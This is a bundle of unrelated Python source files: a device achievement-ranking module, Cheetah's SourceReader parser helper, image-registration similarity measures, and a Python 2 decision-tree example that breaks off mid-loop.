    logging.debug("time_based_place @ {}/{}".format(device_id, achievement_id))
    ranking = time_based_ranking(achievement_id, config, db, params)
    return index_of(ranking, device_id)
def index_of(l, key):
    """Find the entry whose device_id equals `key`.

    Annotates the entry (in place) with its zero-based "rank" and returns
    it; returns None when no entry matches.
    """
    for rank, entry in enumerate(l):
        if entry["device_id"] == key:
            entry["rank"] = rank
            return entry
    return None
@middleware.unsafe()
def count_based_ranking(achievement_id, config, db, params):
    """All devices ranked by raw row counts over the configured tables."""
    logging.debug("count_based_ranking @ {}".format(achievement_id))
    return get_counts(db, config.tables, params)
@middleware.unsafe()
def proc_based_ranking(achievement_id, config, db, params):
    """All devices ranked by their fraction of the overall row count."""
    logging.debug("proc_based_ranking @ {}".format(achievement_id))
    counts = get_counts(db, config.tables, params)
    # Normalize each count by the grand total (local renamed so the
    # builtin sum() stays usable).
    total = 0
    for entry in counts:
        total += entry["value"]
    for entry in counts:
        entry["value"] = entry["value"] / total
    return counts
def get_counts(db, tables, params):
    """Per-device row counts summed over `tables`, sorted descending.

    `params` supplies the optional "from"/"to" timestamp bounds.
    Returns a list of {"device_id", "value"} dicts.
    """
    query = ("SELECT device_id, count(*) AS 'value' FROM {} "
             "WHERE timestamp >= %(from)s AND timestamp <= %(to)s "
             "GROUP BY device_id;")
    totals = {}
    for table in tables:
        db.execute(query.format(table), build_time_range(params["from"], params["to"]))
        for record in db.fetchall():  # Might need a cursor
            device = record["device_id"]
            totals[device] = totals.get(device, 0) + record["value"]
    ordered = sorted(totals, key=lambda k: totals[k], reverse=True)
    return [{"device_id": k, "value": totals[k]} for k in ordered]
@middleware.unsafe()
def time_based_ranking(achievement_id, config, db, params):
    """Rank every device by its earliest recorded timestamp (oldest first)."""
    logging.debug("time_based_ranking @ {}".format(achievement_id))
    template = "SELECT device_id, min(timestamp) as timestamp FROM {} GROUP BY device_id"
    subqueries = "UNION ALL ".join(["(" + template.format(table) + ")" for table in config.tables])
    query = "SELECT device_id, min(timestamp) as timestamp FROM (" + subqueries + ") as t GROUP BY device_id"
    db.execute(query)
    first_seen = {record["device_id"]: record["timestamp"] for record in db.fetchall()}
    return [{"device_id": device_id, "value": first_seen[device_id]}
            for device_id in sorted(first_seen, key=first_seen.get)]
def build_time_range(frm, to):
    """Normalize an optional [from, to] pair into SQL parameters.

    A missing lower bound defaults to the epoch; a missing upper bound
    defaults to now.  NOTE: Aware stores timestamps in unixtime millis.
    """
    if not to:
        to = str(int(time.time()) * 1000)
    return {"from": frm or "0", "to": to}
def dummy_handler(achievement_id, config, db, params):
    """Placeholder for achievement types without a real handler yet."""
    logging.debug("Implement me! :(")
    return None
# Handler dispatch:
def dispatch(handlers, config, achievement_id, db, params=None):
    """Run every configured (handler_name, handler_config) pair.

    `config` maps a result key to such a pair; each handler receives the
    achievement id, its own config, the db handle, and `params` wrapped
    in an EasyDict.  Raises UnknownAchievementHandler for names missing
    from `handlers`.

    The default for `params` is None instead of a shared mutable {}
    (mutable-default-argument fix); passing a dict behaves as before.
    """
    if params is None:
        params = {}
    result = {}
    for key, (handler_name, handler_config) in config.items():
        if handler_name not in handlers:
            raise UnknownAchievementHandler(handler_name)
        result[key] = handlers[handler_name](achievement_id, handler_config, db, easydict.EasyDict(params))
    return result
# Handler initialization
# Three parallel dispatch tables keyed by achievement type name.  Types with
# no meaningful implementation for a given view fall back to dummy_handler.
# NOTE(review): "procent_based" (sic) is the key callers use -- do not respell.
ranking_handlers = {
    "count_based": count_based_ranking,
    "procent_based": proc_based_ranking,
    "time_based": time_based_ranking,
    "wifi_security_special": dummy_handler,
    "wifi_funny_special": dummy_handler,
    "network_percent_data": dummy_handler,
    "battery_mean_usage": dummy_handler
}
# Per-user badge computation handlers.
user_achievement_handlers = {
    "count_based": count_based_badge,
    "procent_based": proc_based_badge,
    "time_based": time_based_badge,
    "wifi_security_special": wifi_security_special_badge,
    "wifi_funny_special": wifi_funny_special_badge,
    "network_percent_data": network_percent_data_badge,
    "battery_mean_usage": battery_mean_usage_badge
}
# Per-user rank-lookup handlers.
user_ranking_handlers = {
    "count_based": count_based_place,
    "procent_based": proc_based_place,
    "time_based": time_based_place,
    "wifi_security_special": dummy_handler,
    "wifi_funny_special": dummy_handler,
    "network_percent_data": dummy_handler,
    "battery_mean_usage": dummy_handler
}
# Expose the tables as attribute-accessible namespaces:
# handlers.ranking, handlers.user.achievements, handlers.user.ranking.
handlers = easydict.EasyDict({})
handlers.ranking = ranking_handlers
handlers.user = {}
handlers.user.achievements = user_achievement_handlers
handlers.user.ranking = user_ranking_handlers
|
|
#!/usr/bin/env python
# $Id: SourceReader.py,v 1.1 2006-09-06 09:50:09 skyostil Exp $
"""SourceReader class for Cheetah's Parser and CodeGenerator
Meta-Data
================================================================================
Author: Tavis Rudd <tavis@damnsimple.com>
License: This software is released for unlimited distribution under the
terms of the MIT license. See the LICENSE file.
Version: $Revision: 1.1 $
Start Date: 2001/09/19
Last Revision Date: $Date: 2006-09-06 09:50:09 $
"""
__author__ = "Tavis Rudd <tavis@damnsimple.com>"
__revision__ = "$Revision: 1.1 $"[11:-2]
import re
import sys
# Trailing horizontal whitespace followed by a line break.
EOLre = re.compile(r'[ \f\t]*(?:\r\n|\r|\n)')
# Like EOLre, but also matches end-of-string, so the final line gets an "EOL".
EOLZre = re.compile(r'(?:\r\n|\r|\n|\Z)')
# PEP 263-style encoding declaration, e.g. "# -*- coding: utf-8 -*-".
# Raw string fixes the invalid "\s"/"\w" escape sequences of the original.
ENCODINGsearch = re.compile(r"coding[=:]\s*([-\w.]+)").search
class Error(Exception):
    """Raised for invalid stream positions, break points, or bookmarks."""
    pass
class SourceReader:
    """Character-stream reader used by Cheetah's Parser and CodeGenerator.

    Wraps a source string with a movable position, row/column lookup,
    named bookmarks, whitespace scanning helpers, and an optional
    artificial end-of-stream (the "break point").

    Fixes relative to the original: `ungetc` had an inverted guard, and
    `gotoBookmark` formatted an unbound variable into its first error
    message (raising NameError instead of Error).
    """
    def __init__(self, src, filename=None, breakPoint=None, encoding=None):
        ## @@TR 2005-01-17: a commented-out patch by Terrel Shumway adding
        ## unicode support (sniffing a PEP 263 coding declaration and
        ## decoding `src`) used to live here.  It forced all sources to
        ## unicode; decoding belongs with the caller that passes `src` in.
        ## The `encoding` parameter is kept for interface compatibility.
        self._src = src
        self._filename = filename
        self._srcLen = len(src)
        # Without an explicit break point the logical end is the real end.
        if breakPoint == None:
            self._breakPoint = self._srcLen
        else:
            self.setBreakPoint(breakPoint)
        self._pos = 0
        self._bookmarks = {}
        self._posTobookmarkMap = {}

        ## collect some meta-information: the end offset of every line ...
        self._EOLs = []
        pos = 0
        while pos < len(self):
            EOLmatch = EOLZre.search(src, pos)
            self._EOLs.append(EOLmatch.start())
            pos = EOLmatch.end()

        ## ... and the begin offset of every line
        self._BOLs = []
        for pos in self._EOLs:
            BOLpos = self.findBOL(pos)
            self._BOLs.append(BOLpos)

    def src(self):
        """The full underlying source string (ignores the break point)."""
        return self._src

    def filename(self):
        return self._filename

    def __len__(self):
        # The logical length is bounded by the break point, not the source.
        return self._breakPoint

    def __getitem__(self, i):
        self.checkPos(i)
        return self._src[i]

    def __getslice__(self, i, j):
        # Python 2 slicing hook; slices are not bounds-checked, matching
        # ordinary string slicing semantics.
        i = max(i, 0); j = max(j, 0)
        return self._src[i:j]

    def splitlines(self):
        # Cached: the line list derives from the immutable source.
        if not hasattr(self, '_srcLines'):
            self._srcLines = self._src.splitlines()
        return self._srcLines

    def lineNum(self, pos=None):
        """0-based line number containing `pos` (default: current position)."""
        if pos == None:
            pos = self._pos
        for i in range(len(self._BOLs)):
            if pos >= self._BOLs[i] and pos <= self._EOLs[i]:
                return i

    def getRowCol(self, pos=None):
        """(row, col), both 1-based, for `pos` (default: current position)."""
        if pos == None:
            pos = self._pos
        lineNum = self.lineNum(pos)
        BOL, EOL = self._BOLs[lineNum], self._EOLs[lineNum]
        return lineNum+1, pos-BOL+1

    def getRowColLine(self, pos=None):
        """(row, col, line-text) triple, typically for error reporting."""
        if pos == None:
            pos = self._pos
        row, col = self.getRowCol(pos)
        return row, col, self.splitlines()[row-1]

    def getLine(self, pos):
        if pos == None:
            pos = self._pos
        lineNum = self.lineNum(pos)
        return self.splitlines()[lineNum]

    def pos(self):
        return self._pos

    def setPos(self, pos):
        self.checkPos(pos)
        self._pos = pos

    def validPos(self, pos):
        return pos <= self._breakPoint and pos >= 0

    def checkPos(self, pos):
        """Raise Error when `pos` lies outside [0, breakPoint]."""
        if not pos <= self._breakPoint:
            raise Error("pos (" + str(pos) + ") is invalid: beyond the stream's end (" +
                        str(self._breakPoint-1) + ")" )
        elif not pos >= 0:
            raise Error("pos (" + str(pos) + ") is invalid: less than 0" )

    def breakPoint(self):
        return self._breakPoint

    def setBreakPoint(self, pos):
        """Move the artificial end-of-stream; must lie within the source."""
        if pos > self._srcLen:
            raise Error("New breakpoint (" + str(pos) +
                        ") is invalid: beyond the end of stream's source string (" +
                        str(self._srcLen) + ")" )
        elif not pos >= 0:
            raise Error("New breakpoint (" + str(pos) + ") is invalid: less than 0" )
        self._breakPoint = pos

    def setBookmark(self, name):
        """Remember the current position under `name`."""
        self._bookmarks[name] = self._pos
        self._posTobookmarkMap[self._pos] = name

    def hasBookmark(self, name):
        # `in` instead of the Python-2-only dict.has_key(); same semantics.
        return name in self._bookmarks

    def gotoBookmark(self, name):
        """Jump back to a previously set bookmark."""
        if not self.hasBookmark(name):
            # Bugfix: the original formatted an unbound `pos` into this
            # message, raising NameError instead of the intended Error.
            raise Error("Invalid bookmark (" + name + ") is invalid: does not exist" )
        pos = self._bookmarks[name]
        if not self.validPos(pos):
            raise Error("Invalid bookmark (" + name + ', '+
                        str(pos) + ") is invalid: pos is out of range" )
        self._pos = pos

    def atEnd(self):
        return self._pos >= self._breakPoint

    def atStart(self):
        return self._pos == 0

    def peek(self, offset=0):
        """Char at current position + `offset`, without advancing."""
        self.checkPos(self._pos+offset)
        pos = self._pos + offset
        return self._src[pos]

    def getc(self):
        """Return the current char and advance (no advance at the end)."""
        pos = self._pos
        if self.validPos(pos+1):
            self._pos += 1
        return self._src[pos]

    def ungetc(self, c=None):
        """Step back one character, optionally substituting `c`.

        Bugfix: the guard was inverted (`if not self.atStart()`), which
        raised on every legitimate unget and let pos go negative when the
        reader was actually at the start.
        """
        if self.atStart():
            raise Error('Already at beginning of stream')
        self._pos -= 1
        if not c==None:
            # NOTE(review): plain strings are immutable, so this item
            # assignment raises TypeError if reached with a str source.
            self._src[self._pos] = c

    def advance(self, offset=1):
        self.checkPos(self._pos + offset)
        self._pos += offset

    def rev(self, offset=1):
        """Move the position `offset` chars backwards."""
        self.checkPos(self._pos - offset)
        self._pos -= offset

    def read(self, offset):
        """Return the next `offset` chars and advance past them."""
        self.checkPos(self._pos + offset)
        start = self._pos
        self._pos += offset
        return self._src[start:self._pos]

    def readTo(self, to, start=None):
        """Return src[start:to] and move the position to `to`."""
        self.checkPos(to)
        if start == None:
            start = self._pos
        self._pos = to
        return self._src[start:to]

    def readToEOL(self, start=None, gobble=True):
        """Read up to (gobble=False) or through (gobble=True) the next EOL."""
        EOLmatch = EOLZre.search(self.src(), self.pos())
        if gobble:
            pos = EOLmatch.end()
        else:
            pos = EOLmatch.start()
        return self.readTo(to=pos, start=start)

    def find(self, it, pos=None):
        if pos == None:
            pos = self._pos
        return self._src.find(it, pos)

    def startswith(self, it, pos=None):
        if self.find(it, pos) == self.pos():
            return True
        else:
            return False

    def rfind(self, it, pos):
        if pos == None:
            pos = self._pos
        return self._src.rfind(it, pos)

    def findBOL(self, pos=None):
        """Offset of the beginning of the line containing `pos`."""
        if pos == None:
            pos = self._pos
        src = self.src()
        return max(src.rfind('\n',0,pos)+1, src.rfind('\r',0,pos)+1, 0)

    def findEOL(self, pos=None, gobble=False):
        """Offset of the next EOL at/after `pos` (past it when gobble=True)."""
        if pos == None:
            pos = self._pos
        match = EOLZre.search(self.src(), pos)
        if gobble:
            return match.end()
        else:
            return match.start()

    def isLineClearToPos(self, pos=None):
        """True when only whitespace precedes `pos` on its line.

        NOTE(review): findBOL() is called without `pos`, so the BOL used is
        that of the *current* position — confirm before relying on an
        explicit `pos` argument here.
        """
        if pos == None:
            pos = self.pos()
        self.checkPos(pos)
        src = self.src()
        BOL = self.findBOL()
        return BOL == pos or src[BOL:pos].isspace()

    def matches(self, strOrRE):
        """Match a literal string or a compiled regex at the current position."""
        if isinstance(strOrRE, (str, unicode)):
            return self.startswith(strOrRE, pos=self.pos())
        else: # assume an re object
            return strOrRE.match(self.src(), self.pos())

    def matchWhiteSpace(self, WSchars=' \f\t'):
        return (not self.atEnd()) and self.peek() in WSchars

    def getWhiteSpace(self, max=None, WSchars=' \f\t'):
        """Consume and return a run of whitespace (at most `max` chars)."""
        if not self.matchWhiteSpace(WSchars):
            return ''
        start = self.pos()
        breakPoint = self.breakPoint()
        if max is not None:
            breakPoint = min(breakPoint, self.pos()+max)
        while self.pos() < breakPoint:
            self.advance()
            if not self.matchWhiteSpace(WSchars):
                break
        return self.src()[start:self.pos()]

    def matchNonWhiteSpace(self, WSchars=' \f\t\n\r'):
        return self.atEnd() or not self.peek() in WSchars

    def getNonWhiteSpace(self, WSchars=' \f\t\n\r'):
        """Consume and return a run of non-whitespace characters."""
        if not self.matchNonWhiteSpace(WSchars):
            return ''
        start = self.pos()
        while self.pos() < self.breakPoint():
            self.advance()
            if not self.matchNonWhiteSpace(WSchars):
                break
        return self.src()[start:self.pos()]
|
|
from ._register import _L1_moments
import numpy as np
from scipy.ndimage import gaussian_filter
TINY = float(np.finfo(np.double).tiny)
SIGMA_FACTOR = 0.05
OVERLAP_MIN = 0.01


# Clamp values to be strictly positive (elementwise) so that the logs and
# divisions below never see zero.  A def instead of an assigned lambda
# (PEP 8 E731); the callable interface is unchanged.
def nonzero(x):
    """Return `x` with every value below TINY replaced by TINY."""
    return np.maximum(x, TINY)
def correlation2loglikelihood(rho2, npts, total_npts):
    """Re-normalize a squared correlation into a composite log-likelihood.

    The result depends on both the correlation and the fraction of source
    voxels that fall inside the reference image domain.

    See: Roche, medical image registration through statistical
    inference, 2001.

    Parameters
    ----------
    rho2: float
        Squared correlation measure.
    npts: int
        Number of source image voxels that transform within the domain
        of the reference image.
    total_npts: int
        Total number of source image voxels involved in computing the
        correlation, including voxels transforming outside the target
        image domain.

    Returns
    -------
    ll: float
        Logarithm of the composite likelihood registration function.
    """
    overlap_fraction = float(npts) / total_npts
    return -.5 * overlap_fraction * np.log(nonzero(1 - rho2))
def dist2loss(q, qI=None, qJ=None):
    """Turn a joint distribution model q(i, j) into the pointwise loss

        L(i, j) = -log q(i, j) / (q(i) q(j))

    where q(i) = sum_j q(i, j) and q(j) = sum_i q(i, j); the marginals
    default to q's own column/row sums.  NOTE: q is normalized in place.

    See: Roche, medical image registration through statistical
    inference, 2001.
    """
    transposed = q.T
    if qI is None:
        qI = q.sum(0)
    if qJ is None:
        qJ = q.sum(1)
    # In-place: divide columns by qI, then rows by qJ via the transposed view.
    q /= nonzero(qI)
    transposed /= nonzero(qJ)
    return -np.log(nonzero(q))
class SimilarityMeasure(object):
    """Base class for joint-histogram similarity measures.

    Subclasses override `loss` (pointwise loss over the histogram) or
    `__call__` directly.
    """
    def __init__(self, shape, total_npoints, renormalize=False, dist=None):
        self.shape = shape
        # Index grids over the histogram: I varies along axis 1, J along axis 0.
        self.J, self.I = np.indices(shape)
        self.renormalize = renormalize
        self.dist = None if dist is None else dist.copy()
        self.total_npoints = nonzero(float(total_npoints))

    def loss(self, H):
        """Pointwise loss; the base class contributes all zeros."""
        return np.zeros(H.shape)

    def npoints(self, H):
        """Total mass of the histogram."""
        return H.sum()

    def overlap_penalty(self, npts):
        # NOTE(review): relies on self.penalty, which this class never sets —
        # presumably assigned externally; confirm before use.
        overlap = npts / self.total_npoints
        return self.penalty * np.log(max(OVERLAP_MIN, overlap))

    def __call__(self, H):
        total = np.sum(H * self.loss(H))
        if self.renormalize:
            denom = self.total_npoints
        else:
            denom = nonzero(self.npoints(H))
        return -(total / denom)
class SupervisedLikelihoodRatio(SimilarityMeasure):
    """Likelihood ratio under a *given* joint intensity model (self.dist)."""
    def loss(self, H):
        # Lazily build and cache the pointwise loss from the supplied model.
        if not hasattr(self, 'L'):
            if self.dist is None:
                raise ValueError('SupervisedLikelihoodRatio: dist attribute cannot be None')
            if self.dist.shape != H.shape:
                raise ValueError('SupervisedLikelihoodRatio: wrong shape for dist attribute')
            self.L = dist2loss(self.dist)
        return self.L
class MutualInformation(SimilarityMeasure):
    """Mutual information, using the normalized joint histogram as the model."""
    def loss(self, H):
        normalized = H / nonzero(self.npoints(H))
        return dist2loss(normalized)
class ParzenMutualInformation(MutualInformation):
    """Mutual information with a Gaussian-smoothed (Parzen) joint model."""
    def loss(self, H):
        if not hasattr(self, 'sigma'):
            # Kernel width scales with the histogram dimensions.
            self.sigma = SIGMA_FACTOR * np.array(H.shape)
        smoothed = H / nonzero(self.npoints(H))
        # Smooth in place, then convert to the pointwise loss.
        gaussian_filter(smoothed, sigma=self.sigma, mode='constant', output=smoothed)
        return dist2loss(smoothed)
class DiscreteParzenMutualInformation(MutualInformation):
    """Mutual information with discrete Parzen windowing of the joint model."""
    def loss(self, H):
        if not hasattr(self, 'sigma'):
            # Kernel width scales with the histogram dimensions.
            self.sigma = SIGMA_FACTOR * np.array(H.shape)
        # Smooth first, then normalize to a distribution.
        smoothed = gaussian_filter(H, sigma=self.sigma, mode='constant')
        smoothed /= nonzero(smoothed.sum())
        return dist2loss(smoothed)
class NormalizedMutualInformation(SimilarityMeasure):
    """NMI = [H(I) + H(J)] / H(I,J)  (Studholme et al., Pattern
    Recognition, 1998).

    An earlier implementation returned the entropy correlation coefficient
    ECC = 2*(1 - H(I,J) / [H(I) + H(J)]), which is an increasing function
    of NMI but not NMI itself.
    """
    def __call__(self, H):
        P = H / nonzero(self.npoints(H))
        marginal_i = P.sum(0)
        marginal_j = P.sum(1)
        def _entropy(p):
            return -np.sum(p * np.log(nonzero(p)))
        #return 2 * (1 - entIJ / nonzero(entI + entJ))
        return (_entropy(marginal_i) + _entropy(marginal_j)) / nonzero(_entropy(P))
class CorrelationCoefficient(SimilarityMeasure):
    """
    Use a bivariate Gaussian as a distribution model.

    `__call__` returns the squared correlation (optionally renormalized
    into a log-likelihood) and now also caches the moments and the signed
    correlation on the instance; `loss()` reads self.mI/mJ/vI/vJ/rho,
    which the original never assigned, so loss() raised AttributeError.
    """
    def loss(self, H):
        rho2 = self(H)
        I = (self.I - self.mI) / np.sqrt(nonzero(self.vI))
        J = (self.J - self.mJ) / np.sqrt(nonzero(self.vJ))
        L = rho2 * I ** 2 + rho2 * J ** 2 - 2 * self.rho * I * J
        tmp = nonzero(1. - rho2)
        L *= .5 / tmp
        L += .5 * np.log(tmp)
        return L

    def __call__(self, H):
        npts = nonzero(self.npoints(H))
        # First- and second-order moments of I and J under the histogram.
        mI = np.sum(H * self.I) / npts
        mJ = np.sum(H * self.J) / npts
        vI = np.sum(H * (self.I) ** 2) / npts - mI ** 2
        vJ = np.sum(H * (self.J) ** 2) / npts - mJ ** 2
        cIJ = np.sum(H * self.J * self.I) / npts - mI * mJ
        rho = cIJ / nonzero(np.sqrt(vI * vJ))
        # Cache for loss(); previously these attributes were never set.
        self.mI, self.mJ, self.vI, self.vJ, self.rho = mI, mJ, vI, vJ, rho
        rho2 = rho ** 2
        if self.renormalize:
            rho2 = correlation2loglikelihood(rho2, npts, self.total_npoints)
        return rho2
def correlation_ratio(H, Y):
    """Correlation ratio eta^2 of a response Y on a predictor X, from a
    nonlinear regression model with Gaussian errors.

    `H` is the joint histogram with shape (dimX, dimY); `Y` must have
    the same shape.  Returns (eta2, npts).
    """
    npts_per_x = np.sum(H, 1)
    denom = nonzero(npts_per_x)
    # Conditional mean and variance of Y given each X bin.
    mY_given_x = np.sum(H * Y, 1) / denom
    vY_given_x = np.sum(H * (Y ** 2), 1) / denom - mY_given_x ** 2
    npts = np.sum(npts_per_x)
    denom = nonzero(npts)
    hY = np.sum(H, 0)
    hX = np.sum(H, 1)
    # Marginal mean and variance of Y.
    mY = np.sum(hY * Y[0, :]) / denom
    vY = np.sum(hY * (Y[0, :] ** 2)) / denom - mY ** 2
    mean_conditional_var = np.sum(hX * vY_given_x) / denom
    return 1. - mean_conditional_var / nonzero(vY), npts
class CorrelationRatio(SimilarityMeasure):
    """Correlation ratio of I on J from the joint histogram."""
    def __call__(self, H):
        eta2, npts = correlation_ratio(H, self.I)
        if not self.renormalize:
            return eta2
        return correlation2loglikelihood(eta2, npts, self.total_npoints)
class ReverseCorrelationRatio(SimilarityMeasure):
    """Correlation ratio with the roles of the two images swapped."""
    def __call__(self, H):
        eta2, npts = correlation_ratio(H.T, self.J.T)
        if not self.renormalize:
            return eta2
        return correlation2loglikelihood(eta2, npts, self.total_npoints)
def correlation_ratio_L1(H):
    """L1 correlation ratio: a nonlinear regression model with Laplace
    distributed errors as the distribution model.

    `H` is the joint histogram with shape (dimX, dimY), X being the
    predictor and Y the response.  Returns (eta, npts).
    """
    # L1 moments (count, median, mean absolute deviation) per X bin.
    per_x = np.array([_L1_moments(H[x, :]) for x in range(H.shape[0])])
    npts_X, mY_X, sY_X = per_x[:, 0], per_x[:, 1], per_x[:, 2]
    hY = np.sum(H, 0)
    hX = np.sum(H, 1)
    npts, mY, sY = _L1_moments(hY)
    mean_sY_X = np.sum(hX * sY_X) / nonzero(npts)
    return 1 - mean_sY_X / nonzero(sY), npts
class CorrelationRatioL1(CorrelationRatio):
    """Correlation ratio under a Laplace-error (L1) regression model."""
    def __call__(self, H):
        eta, npts = correlation_ratio_L1(H)
        if not self.renormalize:
            return eta
        return -(npts / self.total_npoints) * np.log(nonzero(1 - eta))
class ReverseCorrelationRatioL1(CorrelationRatio):
    """L1 correlation ratio with the roles of the two images swapped."""
    def __call__(self, H):
        eta, npts = correlation_ratio_L1(H.T)
        if not self.renormalize:
            return eta
        return -(npts / self.total_npoints) * np.log(nonzero(1 - eta))
# Registry mapping short measure keys (as used by the registration API)
# to their implementing classes.
similarity_measures = {
    'slr': SupervisedLikelihoodRatio,
    'mi': MutualInformation,
    'nmi': NormalizedMutualInformation,
    'pmi': ParzenMutualInformation,
    'dpmi': DiscreteParzenMutualInformation,
    'cc': CorrelationCoefficient,
    'cr': CorrelationRatio,
    'crl1': CorrelationRatioL1,
    'rcr': ReverseCorrelationRatio,
    'rcrl1': ReverseCorrelationRatioL1}
|
|
'''
Created on Oct 4, 2015
@author: Amol
'''
from itertools import groupby
from math import log
# Sample dataset: [referrer, country, read-FAQ flag, pages viewed, tier].
# The last column is the classification target used by the tree builder.
my_data = [['slashdot', 'USA', 'yes', 18, 'None'],
           ['google', 'France', 'yes', 23, 'Premium'],
           ['digg', 'USA', 'yes', 24, 'Basic'],
           ['kiwitobes', 'France', 'yes', 23, 'Basic'],
           ['google', 'UK', 'no', 21, 'Premium'],
           ['(direct)', 'New Zealand', 'no', 12, 'None'],
           ['(direct)', 'UK', 'no', 21, 'Basic'],
           ['google', 'USA', 'no', 24, 'Premium'],
           ['slashdot', 'France', 'yes', 19, 'None'],
           ['digg', 'USA', 'no', 18, 'None'],
           ['google', 'UK', 'no', 18, 'None'],
           ['kiwitobes', 'UK', 'no', 19, 'None'],
           ['digg', 'New Zealand', 'yes', 12, 'Basic'],
           ['slashdot', 'UK', 'no', 21, 'None'],
           ['google', 'UK', 'yes', 18, 'Basic'],
           ['kiwitobes', 'France', 'yes', 19, 'Basic']]
class decisionnode:
    """One node of the decision tree.

    col:     column index of the criterion tested at this node
    value:   value the column must match (or meet, for numbers)
    results: dictionary of outcome counts, set only on leaf nodes
    tb/fb:   subtrees taken on a true / false condition
    """
    def __init__(self, col=-1, value=None, results=None, tb=None, fb=None):
        self.col, self.value = col, value
        self.results = results
        self.tb, self.fb = tb, fb
#
# Divide the given rows in two lists based on the following condition
# For numeric types, the split lists are based on the condition >= and < the given value
# for other types the check splits the rows in row based on whether the value is = or not = to the given value
#
def divideset(rows, column, value):
    """Split `rows` in two on `column`.

    Numeric values split by >= `value`; anything else splits by equality.
    Returns a (matching, non_matching) pair of lists, order preserved.
    """
    if isinstance(value, (int, float)):
        def matches(row):
            return row[column] >= value
    else:
        def matches(row):
            return row[column] == value
    true_rows, false_rows = [], []
    for row in rows:
        (true_rows if matches(row) else false_rows).append(row)
    return (true_rows, false_rows)
#
# Get the dictionary of possible results. The function assumes the last column in each row is the result
#
def uniquecounts(rows):
    """Count each outcome, assuming a row's last column is the result.

    Rewritten without the Python-2-only tuple-parameter lambda
    (``lambda (k, _): k``) and without the needless sort + groupby:
    a single O(n) counting pass returning the same dictionary.
    """
    counts = {}
    for row in rows:
        result = row[-1]
        counts[result] = counts.get(result, 0) + 1
    return counts
# Probability that a randomly placed item will
# be in the wrong category
# In this case it is as follows
# Item is None and Classified as Basic
# or
# Item is None and Classified as Premium
# or
# Item is Basic and Classified as None
# or
# Item is Basic and Classified as Premium
# or
# Item is Premium and Classified as None
# or
# Item is Premium and Classified as Basic
# Mathematically it is
#
# P(N)*P(B) + P(N)*P(P) + P(B)*P(N) + P(B)*P(P) + P(P)*P(N) + P(P)*P(B)
# where
# P(N) The Result is None,
# P(B) The Result is Basic, that is the membership chosen is Basic
# P(P) The Result is Premium, that is the membership chosen is Premium
#
# This however is simplified by doing the following 1 - ( P(N)*P(N) + P(B)*P(B) + P(P)*P(P) )
def giniimpurity(rows):
    """Gini impurity: the probability that a randomly placed item would be
    classified into the wrong category, i.e. 1 - sum of squared class
    probabilities."""
    total = float(len(rows))
    counts = uniquecounts(rows)
    return 1 - sum((v / total) ** 2 for v in counts.values())
# Entropy is the amount of disorder in the set.
# It is defined as p(i) * log2(p(i)) for all outcomes
def entropy(rows):
    """Shannon entropy of the outcome distribution: -sum p(i)*log2(p(i))."""
    total = float(len(rows))
    counts = uniquecounts(rows)
    return sum(-(v / total) * log(v / total, 2) for v in counts.values())
#
# Recursively grow a CART-style decision tree over `rows`, scoring splits
# with `scoref` (entropy by default; giniimpurity also works).
#
def buildtree(rows, scoref=entropy):
    """Build and return a decisionnode tree for the given training rows.

    The last column of each row is the class label; all other columns are
    candidate split features.  Returns an empty decisionnode for no rows.
    """
    if len(rows) == 0 : return decisionnode()
    current_score = scoref(rows)
    # Initialize with defaults
    best_gain = 0.0
    best_criteria_col_index, best_criteria_col_value = (None, None)
    best_true_set, best_false_set = (None, None)
    # Algorithm is as follows
    # 1. For each of the columns, find distinct values across the rows
    # 2. Partition the set into two, called set1 and set2 based on each of these columns and the corresponding values they hold
    # 3. Calculate the information gain as follows
    #    info_gain = current_score - P(set1) * scoref(set1) - P(set2) * scoref(set2)
    # 4. If info gain is negative, no point going ahead, this is the leaf node. Set the result as the uniquecount(rows)
    # 5. If however, the information gain is more than 0, then take the best set1 and set2 and the partitioning column and value
    #    as the criteria
    # 6. Recursively call buildtree on set1 and set2 to get the true and false branch and return a decisionnode with the returned
    #    left and right tree and the best criteria column index and value
    # NOTE(review): frozenset iteration order is not deterministic across
    # runs, so ties in gain may pick different (equally good) splits.
    row_val_pair = frozenset([(i, row[i]) for i in range(len(rows[0]) - 1) for row in rows])
    #row_val_pair = [(i, row[i]) for i in range(len(rows[0])) for row in rows]
    n_rows = len(rows)
    for column, value in row_val_pair:
        t_set, f_set = divideset(rows, column, value)
        p = float(len(t_set)) / n_rows
        gain = current_score - p * scoref(t_set) - (1 - p) * scoref(f_set)
        # Only accept splits that actually separate the rows into two
        # non-empty groups and strictly improve on the best gain so far.
        if gain > best_gain and len(t_set) > 0 and len(f_set) > 0:
            best_gain = gain
            best_criteria_col_index, best_criteria_col_value = (column, value)
            best_true_set, best_false_set = (t_set, f_set)
    if best_gain > 0:
        # Intermediate node
        tb = buildtree(best_true_set, scoref)
        fb = buildtree(best_false_set, scoref)
        return decisionnode(col=best_criteria_col_index, value=best_criteria_col_value, tb=tb, fb=fb)
    else:
        # It is a leaf node
        return decisionnode(results=uniquecounts(rows))
# Taken as is from the reference implementation.
# NOTE(review): uses Python 2 print statements; this file is Python 2 only.
def printtree(tree, indent=''):
    """Pretty-print the tree; true branches under 'T->', false under 'F->'."""
    # Is this a leaf node?
    if tree.results != None:
        print str(tree.results)
    else:
        # Print the criteria
        print str(tree.col) + ':' + str(tree.value) + '? '
        # Print the branches
        print indent + 'T->',
        printtree(tree.tb, indent + '  ')
        print indent + 'F->',
        printtree(tree.fb, indent + '  ')
# Taken as is
def classify(observation, tree):
    """Walk the tree for one observation and return the leaf's result dict.

    Numeric split columns use a >= threshold test; any other column type
    uses an equality test.
    """
    # Leaf node: the stored result counts are the answer.
    if tree.results is not None:
        return tree.results
    value = observation[tree.col]
    if isinstance(value, (int, float)):
        follow_true = value >= tree.value
    else:
        follow_true = value == tree.value
    next_branch = tree.tb if follow_true else tree.fb
    return classify(observation, next_branch)
# Ad-hoc smoke checks kept from development (expected values noted inline):
# print(uniquecounts(my_data))
# print giniimpurity(my_data) # 0.6328125
# print entropy(my_data) #1.50524081494
# yes_list, no_list = divideset(my_data, 2 , 'yes')
# print entropy(yes_list)
# print giniimpurity(yes_list)
#
#
# Prune a tree
def prune(tree, mingain, scoref=entropy):
    """Prune the tree by merging leaf pairs whose split gains < mingain.

    NOTE(review): not implemented yet — this is a no-op stub that returns
    None and leaves `tree` untouched.
    """
    # TODO: Prune the tree here
    None
# --- Module-level demo / self-test (Python 2 only: print statements). ---
# Trains on my_data (defined earlier in this file) and re-classifies the
# same rows, so accuracy should be 100%.
tree = buildtree(my_data)
#print "Built tree is "
printtree(tree)
print "Testing the tree from the training data, should get 100% accuracy"
total = 0
failure = 0
for data in my_data:
